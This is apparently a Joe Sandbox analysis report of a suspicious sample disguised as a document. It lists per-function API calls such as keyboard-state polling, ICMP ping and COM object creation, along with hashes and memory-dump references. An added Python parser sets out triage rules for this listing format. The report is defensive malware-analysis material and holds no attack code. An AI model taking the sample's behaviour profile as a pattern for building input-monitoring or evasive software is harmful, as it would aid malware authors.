                                                        Similarity
                                                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                        • String ID:
                                                        • API String ID: 3566271842-0
                                                        • Opcode ID: 17001cad1b48132ada953eaba1f8bcf207a941ce19fa499b6de180c3e1e86f9f
                                                        • Instruction ID: 8e913378d8f7c25b989bd003c30930bf8d1368ca0ab2bfdb8e3292a3d357f7b6
                                                        • Opcode Fuzzy Hash: 17001cad1b48132ada953eaba1f8bcf207a941ce19fa499b6de180c3e1e86f9f
                                                        • Instruction Fuzzy Hash: 86711175900219EFDB10DFA4C989ADEB7B9FF49310F048096E90AAB251D778EE41CF94
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00753908
                                                        • SetKeyboardState.USER32(?), ref: 00753973
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00753993
                                                        • GetKeyState.USER32(000000A0), ref: 007539AA
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 007539D9
                                                        • GetKeyState.USER32(000000A1), ref: 007539EA
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00753A16
                                                        • GetKeyState.USER32(00000011), ref: 00753A24
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00753A4D
                                                        • GetKeyState.USER32(00000012), ref: 00753A5B
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00753A84
                                                        • GetKeyState.USER32(0000005B), ref: 00753A92
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
Similarity
• API ID: State$Async$Keyboard
• API String ID: 541375521-0
APIs
• GetDlgItem.USER32(?,00000001), ref: 0074FB19
• GetWindowRect.USER32(00000000,?), ref: 0074FB2B
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0074FB89
• GetDlgItem.USER32(?,00000002), ref: 0074FB94
• GetWindowRect.USER32(00000000,?), ref: 0074FBA6
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0074FBFC
• GetDlgItem.USER32(?,000003E9), ref: 0074FC0A
• GetWindowRect.USER32(00000000,?), ref: 0074FC1B
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0074FC5E
• GetDlgItem.USER32(?,000003EA), ref: 0074FC6C
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0074FC89
• InvalidateRect.USER32(?,00000000,00000001), ref: 0074FC96
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• API String ID: 3096461208-0
APIs
  • Part of subcall function 0072B155: GetWindowLongW.USER32(?,000000EB), ref: 0072B166
• GetSysColor.USER32(0000000F), ref: 0072B067
Similarity
• API ID: ColorLongWindow
• API String ID: 259745315-0
APIs
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• API String ID: 136442275-0
APIs
• __swprintf.LIBCMT ref: 007184E5
• __itow.LIBCMT ref: 00718519
  • Part of subcall function 00732177: _xtow@16.LIBCMT ref: 00732198
Similarity
• API ID: __itow__swprintf_xtow@16
• String ID: %.15g$0x%p$False$True
• API String ID: 1502193981-2263619337
APIs
• _memset.LIBCMT ref: 00735CCA
  • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
• __gmtime64_s.LIBCMT ref: 00735D63
• __gmtime64_s.LIBCMT ref: 00735D99
• __gmtime64_s.LIBCMT ref: 00735DB6
• __allrem.LIBCMT ref: 00735E0C
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00735E28
• __allrem.LIBCMT ref: 00735E3F
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00735E5D
• __allrem.LIBCMT ref: 00735E74
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00735E92
• __invoke_watson.LIBCMT ref: 00735F03
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• API String ID: 384356119-0
APIs
• _memset.LIBCMT ref: 00755816
• GetMenuItemInfoW.USER32(007D18F0,000000FF,00000000,00000030), ref: 00755877
• SetMenuItemInfoW.USER32(007D18F0,00000004,00000000,00000030), ref: 007558AD
• Sleep.KERNEL32(000001F4), ref: 007558BF
• GetMenuItemCount.USER32(?), ref: 00755903
• GetMenuItemID.USER32(?,00000000), ref: 0075591F
• GetMenuItemID.USER32(?,-00000001), ref: 00755949
• GetMenuItemID.USER32(?,?), ref: 0075598E
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007559D4
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007559E8
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00755A09
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• API String ID: 4176008265-0
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00779AA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00779AA8
• GetWindowLongW.USER32(?,000000F0), ref: 00779ACC
• _memset.LIBCMT ref: 00779ADD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00779AEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00779B67
Similarity
• API ID: MessageSend$LongWindow_memset
• API String ID: 830647256-0
APIs
• GetKeyboardState.USER32(?), ref: 00753591
• GetAsyncKeyState.USER32(000000A0), ref: 00753612
• GetKeyState.USER32(000000A0), ref: 0075362D
• GetAsyncKeyState.USER32(000000A1), ref: 00753647
• GetKeyState.USER32(000000A1), ref: 0075365C
• GetAsyncKeyState.USER32(00000011), ref: 00753674
• GetKeyState.USER32(00000011), ref: 00753686
• GetAsyncKeyState.USER32(00000012), ref: 0075369E
• GetKeyState.USER32(00000012), ref: 007536B0
• GetAsyncKeyState.USER32(0000005B), ref: 007536C8
• GetKeyState.USER32(0000005B), ref: 007536DA
Similarity
• API ID: State$Async$Keyboard
• API String ID: 541375521-0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0074A2AA
• SafeArrayAllocData.OLEAUT32(?), ref: 0074A2F5
• VariantInit.OLEAUT32(?), ref: 0074A307
• SafeArrayAccessData.OLEAUT32(?,?), ref: 0074A327
• VariantCopy.OLEAUT32(?,?), ref: 0074A36A
• SafeArrayUnaccessData.OLEAUT32(?), ref: 0074A37E
• VariantClear.OLEAUT32(?), ref: 0074A393
• SafeArrayDestroyData.OLEAUT32(?), ref: 0074A3A0
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0074A3A9
• VariantClear.OLEAUT32(?), ref: 0074A3BB
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0074A3C6
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: 5fc21dd1d30f17b475476c87e0babf6292e2d6e3ed82552de0a091ec96f4c16c
                                                        • Instruction ID: 572774dc9e59cbafd51086a553d2b91736288b0d29feabd6ad5198ef9aa488cc
                                                        • Opcode Fuzzy Hash: 5fc21dd1d30f17b475476c87e0babf6292e2d6e3ed82552de0a091ec96f4c16c
                                                        • Instruction Fuzzy Hash: 29415D31900219FFCB10DFA4DC889DEBBB9FF48354F108065E901A3261DB78AA46CBA1
                                                        APIs
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                        • CoInitialize.OLE32 ref: 0076B298
                                                        • CoUninitialize.COMBASE ref: 0076B2A3
                                                        • CoCreateInstance.COMBASE(?,00000000,00000017,0079D8FC,?), ref: 0076B303
                                                        • IIDFromString.COMBASE(?,?), ref: 0076B376
                                                        • VariantInit.OLEAUT32(?), ref: 0076B410
                                                        • VariantClear.OLEAUT32(?), ref: 0076B471
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 834269672-1287834457
                                                        • Opcode ID: 71b0a929df3eeae927557c4d474bcd593be3799f30953a5d985adbd203b79969
                                                        • Instruction ID: 550c66b964f6da9b0dff1d46325e244f94d5a8999d05fc9ac1c2bf2794f6d2c6
                                                        • Opcode Fuzzy Hash: 71b0a929df3eeae927557c4d474bcd593be3799f30953a5d985adbd203b79969
                                                        • Instruction Fuzzy Hash: 30617D712043119FC710DF55C889B6AB7E8EF89714F04441DF986DB292DB78ED85CB92
                                                        APIs
                                                        • WSAStartup.WS2_32(00000101,?), ref: 007686F5
                                                        • inet_addr.WS2_32(?), ref: 0076873A
                                                        • gethostbyname.WS2_32(?), ref: 00768746
                                                        • IcmpCreateFile.IPHLPAPI ref: 00768754
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007687C4
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007687DA
                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0076884F
                                                        • WSACleanup.WS2_32 ref: 00768855
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: 92731a353179fa0e747f77afdfb0aaa9747f423a9f8a4b5226d7ee62b001c994
                                                        • Instruction ID: 12d572c4bbf2a9626ef9b10cd7ed7d40da986c0ba0dfe63413de7e3699aa8f43
                                                        • Opcode Fuzzy Hash: 92731a353179fa0e747f77afdfb0aaa9747f423a9f8a4b5226d7ee62b001c994
                                                        • Instruction Fuzzy Hash: B751B431604201DFD761DF64CC49B6A77E4EF48720F14892AF996D72A1DB78EC41CB42
                                                        APIs
                                                        • _memset.LIBCMT ref: 00779C68
                                                        • CreateMenu.USER32 ref: 00779C83
                                                        • SetMenu.USER32(?,00000000), ref: 00779C92
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00779D1F
                                                        • IsMenu.USER32(?), ref: 00779D35
                                                        • CreatePopupMenu.USER32 ref: 00779D3F
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00779D70
                                                        • DrawMenuBar.USER32 ref: 00779D7E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                        • String ID: 0
                                                        • API String ID: 176399719-4108050209
                                                        • Opcode ID: c3a949255b6e141888be710cd62bd335771d78a18de8b7838fb26f2f6d9db52f
                                                        • Instruction ID: c062281592cc3d17c5b0162dc6f078c288df3182a7425e044267e3280602d61c
                                                        • Opcode Fuzzy Hash: c3a949255b6e141888be710cd62bd335771d78a18de8b7838fb26f2f6d9db52f
                                                        • Instruction Fuzzy Hash: 3B415575A01209EFDF20EFA4D844BDABBB5FF49354F148029EA4997351D738A910DB60
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0075EC1E
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0075EC94
                                                        • GetLastError.KERNEL32 ref: 0075EC9E
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0075ED0B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: cc9144a1ce8c8cac673d6b8264f2afe3ea3cec6d7d709695769f8dc50c7c8bad
                                                        • Instruction ID: e93e87b7202323afa9dceedb533444bc9829616a59d2ce62607da7014384803b
                                                        • Opcode Fuzzy Hash: cc9144a1ce8c8cac673d6b8264f2afe3ea3cec6d7d709695769f8dc50c7c8bad
                                                        • Instruction Fuzzy Hash: 3231C335A00209DFC715EF68C949EEE77B4EF44702F10801AE906D72D1DAB8DE86CBA1
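The per-function API listings in this report follow one fixed line format (`• Name.MODULE(args), ref: ADDR`, with a `Part of subcall function ADDR:` prefix for calls made inside a callee and `?` for argument values the sandbox could not recover). The block below is an added example, not part of the Joe Sandbox report or its tooling: a small Python parser for that format plus three triage rules driven by the Ping, COM-instantiation and drive-status routines listed above. The sample input is constructed from lines copied from those three blocks; the rule names and the dictionary layout of the findings are my own. The argument decoding relies only on the documented Win32 signatures: the eighth IcmpSendEcho argument is the timeout (0xFA0 = 4000 ms) and the seventh the reply-buffer size (0x29 = 41 bytes, which is sizeof(ICMP_ECHO_REPLY) plus the 5-byte payload plus 8), the third CoCreateInstance argument is the CLSCTX mask (0x17 = CLSCTX_ALL), and SetErrorMode(1) is SEM_FAILCRITICALERRORS, which suppresses the "insert a disk" dialog before GetDiskFreeSpaceW probes a drive.

```python
"""Added example (not Joe Sandbox code): parse per-function API listings, apply triage rules."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: lines copied from three function blocks of the report above.
SAMPLE_REPORT = """\
APIs
• WSAStartup.WS2_32(00000101,?), ref: 007686F5
• inet_addr.WS2_32(?), ref: 0076873A
• gethostbyname.WS2_32(?), ref: 00768746
• IcmpCreateFile.IPHLPAPI ref: 00768754
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007687C4
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 0076884F
• WSACleanup.WS2_32 ref: 00768855
Strings
APIs
  • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
• CoInitialize.OLE32 ref: 0076B298
• CoCreateInstance.COMBASE(?,00000000,00000017,0079D8FC,?), ref: 0076B303
• IIDFromString.COMBASE(?,?), ref: 0076B376
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0075EC1E
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0075EC94
• SetErrorMode.KERNEL32(00000000,READY), ref: 0075ED0B
"""

# One bullet: optional "Part of subcall function ADDR:", Name.MODULE, optional "(args)", "ref: ADDR".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w@$?]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                          # int for hex, str for symbolic (READY), None for "?"
    ref: int                            # call-site address
    subcall_of: Optional[int] = None    # parent address for "Part of subcall function" lines

@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)

def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None                      # value not recovered by the sandbox
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)              # 32-bit value printed as 8 hex digits
    return tok

def parse_report(text: str) -> list:
    """Start a new block at every 'APIs' heading; parse the bullet lines under it."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        m = CALL_RE.match(line)
        if m is None or current is None:
            continue
        raw = m["args"] or ""
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        current.calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
    return blocks

SEM_FAILCRITICALERRORS = 0x1
CLSCTX_BITS = {0x1: "INPROC_SERVER", 0x2: "INPROC_HANDLER", 0x4: "LOCAL_SERVER", 0x10: "REMOTE_SERVER"}

def decode_clsctx(mask: int) -> str:
    return "|".join(n for bit, n in CLSCTX_BITS.items() if mask & bit) or hex(mask)

def triage(block: FunctionBlock) -> list:
    """Rules over one function's direct calls (subcall lines describe callees, so they are skipped)."""
    direct = [c for c in block.calls if c.subcall_of is None]
    names = {c.name for c in direct}
    findings = []
    if {"IcmpCreateFile", "IcmpSendEcho"} <= names:
        echo = next(c for c in direct if c.name == "IcmpSendEcho")
        # IcmpSendEcho(handle, dest, data, size, options, reply, replysize, timeout)
        ok = len(echo.args) == 8
        findings.append({"rule": "icmp_ping",
                         "reply_buffer_size": echo.args[6] if ok else None,
                         "timeout_ms": echo.args[7] if ok else None})
    for c in direct:
        # CoCreateInstance(rclsid, pUnkOuter, dwClsContext, riid, ppv)
        if c.name == "CoCreateInstance" and len(c.args) == 5 and isinstance(c.args[2], int):
            findings.append({"rule": "com_instantiation", "clsctx": decode_clsctx(c.args[2])})
    probe = next((c for c in direct if c.name == "GetDiskFreeSpaceW"), None)
    if probe is not None:
        # SetErrorMode(SEM_FAILCRITICALERRORS) ahead of the probe suppresses the
        # "insert a disk" dialog, so empty removable drives are queried silently.
        armed = any(c.name == "SetErrorMode" and c.args[:1] == [SEM_FAILCRITICALERRORS]
                    and c.ref < probe.ref for c in direct)
        findings.append({"rule": "drive_probe",
                         "error_mode": "SEM_FAILCRITICALERRORS" if armed else "default"})
    return findings

if __name__ == "__main__":
    for i, blk in enumerate(parse_report(SAMPLE_REPORT)):
        print(i, [c.name for c in blk.calls], triage(blk))
```

Run it on a whole report export rather than the constructed snippet to get one findings list per function; the `ref` ordering check in the drive rule is what keeps a later `SetErrorMode(0)` reset from being mistaken for the arming call.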
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0074C782
                                                        • GetDlgCtrlID.USER32 ref: 0074C78D
                                                        • GetParent.USER32 ref: 0074C7A9
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0074C7AC
                                                        • GetDlgCtrlID.USER32(?), ref: 0074C7B5
                                                        • GetParent.USER32(?), ref: 0074C7D1
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0074C7D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 313823418-1403004172
                                                        • Opcode ID: 34566f517979c770e83bffb638fc5772c3f3bb2401d6a7ba322fd4aee309f2b5
                                                        • Instruction ID: 46fd7a508cafc0b47184e7868442dbc59da54aa5fa6e48b82d126442bc8ab140
                                                        • Opcode Fuzzy Hash: 34566f517979c770e83bffb638fc5772c3f3bb2401d6a7ba322fd4aee309f2b5
                                                        • Instruction Fuzzy Hash: E721AE74900208AFCB06EBA4CC85EFEB775AB45310F508116F562932E1DB7C9856EA20
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0074C869
                                                        • GetDlgCtrlID.USER32 ref: 0074C874
                                                        • GetParent.USER32 ref: 0074C890
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0074C893
                                                        • GetDlgCtrlID.USER32(?), ref: 0074C89C
                                                        • GetParent.USER32(?), ref: 0074C8B8
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0074C8BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 313823418-1403004172
                                                        • Opcode ID: 4d963fb45c2b10ca4f9e7dc11c41fb16ad47baf41ddc0f6546609cd9ace9c622
                                                        • Instruction ID: dfac57e5fe12d2656a15f92d61c8af61700bcef8405bbfa71f046a95ad896365
                                                        • Opcode Fuzzy Hash: 4d963fb45c2b10ca4f9e7dc11c41fb16ad47baf41ddc0f6546609cd9ace9c622
                                                        • Instruction Fuzzy Hash: 49219D71A01208AFDB06AFA4CC89EFEBB79AF45300F508016F551A31D2DB7D9856EB60
                                                        APIs
                                                        • GetParent.USER32 ref: 0074C8D9
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 0074C8EE
                                                        • _wcscmp.LIBCMT ref: 0074C900
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0074C97B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1704125052-3381328864
                                                        • Opcode ID: e1c10429852ec6bb895d640e28f524c4ebab9209c6047c7b9e90e46d1a8f7758
                                                        • Instruction ID: 522b3efbdb212d5cdb1110561f9a55e05d3b9fd2f00cf9fa1f950e72d2d66104
                                                        • Opcode Fuzzy Hash: e1c10429852ec6bb895d640e28f524c4ebab9209c6047c7b9e90e46d1a8f7758
                                                        • Instruction Fuzzy Hash: 1911ACF7649702FAF6552A30DC0BDA6B7ACDB06764F20401AF900A50D3FBAD7D129554
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0076B777
                                                        • CoInitialize.OLE32(00000000), ref: 0076B7A4
                                                        • CoUninitialize.COMBASE ref: 0076B7AE
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0076B8AE
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 0076B9DB
                                                        • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0076BA0F
                                                        • CoGetObject.OLE32(?,00000000,0079D91C,?), ref: 0076BA32
                                                        • SetErrorMode.KERNEL32(00000000), ref: 0076BA45
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0076BAC5
                                                        • VariantClear.OLEAUT32(0079D91C), ref: 0076BAD5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
